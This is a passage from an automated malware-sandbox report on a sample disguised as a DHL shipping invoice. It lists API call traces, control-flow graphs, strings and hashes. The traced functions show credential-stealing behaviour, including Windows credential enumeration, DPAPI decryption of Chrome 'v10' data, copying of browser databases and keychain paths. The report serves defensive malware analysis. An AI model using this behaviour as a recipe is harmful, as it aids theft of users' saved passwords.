                                                                                                                                                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 767404330-0
                                                                                                                                                                                                                                      • Opcode ID: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
                                                                                                                                                                                                                                      • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                                                                      • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFind$FirstNext
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1690352074-0
                                                                                                                                                                                                                                      • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                                      • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                                                                      • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InfoSystemmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3558857096-0
                                                                                                                                                                                                                                      • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                                                                                                                                                      • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-44558c call 4136c0 call 41366b 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 53 445879-44587c 18->53 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 79 445685 21->79 80 4456b2-4456b5 call 40b1ab 21->80 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 131 44592d-445945 call 40b6ef 24->131 132 44594a 24->132 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 149 4459d0-4459e8 call 40b6ef 29->149 150 4459ed 29->150 30->21 41 445609-44560d 30->41 31->30 185 445b08-445b15 call 40ae51 37->185 54 445c7c-445c85 38->54 55 445b38-445b96 memset * 3 38->55 41->21 51 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->51 42->3 43->42 56 44584c-445854 call 40b1ab 45->56 57 445828 45->57 146 445665-445670 call 40b1ab 51->146 147 445643-445663 call 40a9b5 call 4087b3 51->147 67 4458a2-4458aa call 40b1ab 53->67 68 44587e 53->68 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->69 70 445b98-445ba0 55->70 56->13 71 44582e-445847 call 40a9b5 call 4087b3 57->71 84 445fae-445fb2 63->84 85 445d2b-445d3b 63->85 163 445cf5 64->163 164 445cfc-445d03 64->164 67->19 77 445884-44589d call 40a9b5 call 4087b3 68->77 247 445c77 69->247 70->69 78 445ba2-445bcf call 4099c6 call 445403 call 445389 70->78 134 445849 71->134 152 44589f 77->152 78->54 95 44568b-4456a4 call 40a9b5 call 4087b3 79->95 113 4456ba-4456c4 80->113 100 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 85->100 101 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 85->101 154 4456a9-4456b0 95->154 169 445d67-445d6c 100->169 170 445d71-445d83 call 445093 100->170 196 445e17 101->196 197 445e1e-445e25 101->197 127 4457f9 113->127 128 4456ca-4456d3 call 413cfa call 413d4c 113->128 127->6 179 4456d8-4456f7 call 40b2cc call 413fa6 128->179 131->132 132->23 134->56 146->113 147->146 149->150 150->28 152->67 154->80 154->95 163->164 176 445d05-445d13 164->176 177 445d17 164->177 171 445fa1-445fa9 call 40b6ef 169->171 170->84 171->84 176->177 177->63 204 4456fd-445796 memset * 4 call 409c70 * 3 179->204 205 4457ea-4457f7 call 413d29 179->205 200 445b17-445b27 call 40aebe 185->200 201 445aa3-445ab0 call 40add4 185->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->185 218 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->218 242 445e62-445e69 202->242 243 445e5b 202->243 223 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->223 204->205 246 445798-4457ca call 40b2cc call 409d1f call 409b98 204->246 205->10 218->185 223->84 254 445f9b 223->254 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->205 265 4457cc-4457e5 call 4087b3 246->265 247->54 264 445f4d-445f5a call 40ae51 248->264 254->171 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->205 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->223 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445725
                                                                                                                                                                                                                                        • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                                        • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                                                                        • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445755
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                        • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                                        • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                                                                                        • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                                        • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                                                        • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445986
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                                                                                      • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                                                                      • API String ID: 1963886904-3798722523
                                                                                                                                                                                                                                      • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                                                                                                                                      • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                                                                                                                                        • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                                        • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                                                                                                                                        • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                                      • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                                                                                                                                                                                      • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                                                                      • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                                                                      • API String ID: 2744995895-28296030
                                                                                                                                                                                                                                      • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                                                                                                                                                      • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                        • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                                                                        • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                      • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                                                                                                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                                        • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                                                                                                                                                                      • String ID: chp$v10
                                                                                                                                                                                                                                      • API String ID: 1297422669-2783969131
                                                                                                                                                                                                                                      • Opcode ID: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                                                                                                                                                                                                                                      • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 511 40e304-40e316 call 406e8f 510->511 516 40e476-40e483 call 406b53 511->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 511->517 522 40e302 516->522 523 40e489-40e495 call 40aa04 516->523 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 522->511 523->509 530 40e497-40e49f free 523->530 530->509 543 40e3d0-40e3d6 541->543 544 40e3d9-40e3de 541->544 551 40e3b0 542->551 552 40e3b3-40e3c1 wcschr 542->552 543->544 546 40e3e0-40e3f1 memcpy 544->546 547 40e3f4-40e3f9 544->547 546->547 549 40e3fb-40e40c memcpy 547->549 550 40e40f-40e414 547->550 549->550 554 40e416-40e427 memcpy 550->554 555 40e42a-40e42f 550->555 551->552 552->541 553 40e3c3-40e3c6 552->553 553->541 554->555 556 40e431-40e442 memcpy 555->556 557 40e445-40e44a 555->557 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040E49A
                                                                                                                                                                                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                                                      • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,757C2EE0), ref: 0040E3EC
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,757C2EE0), ref: 0040E407
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,757C2EE0), ref: 0040E422
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,757C2EE0), ref: 0040E43D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                                                                                      • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                                                                      • API String ID: 3849927982-2252543386
                                                                                                                                                                                                                                      • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                                                                                                                                      • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 602 4094f7-4094fa call 424f26 598->602 600->567 602->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 617 4093e4-4093fb call 4253af * 2 613->617 615 4092bc 614->615 616 4092be-4092e3 memcpy memcmp 614->616 615->616 618 409333-409345 memcmp 616->618 619 4092e5-4092ec 616->619 617->602 627 409401-409403 617->627 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->602 628 409409-40941b memcmp 627->628 628->602 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->602 633 4094b8-4094ed memcpy * 2 630->633 631->602 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->602
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
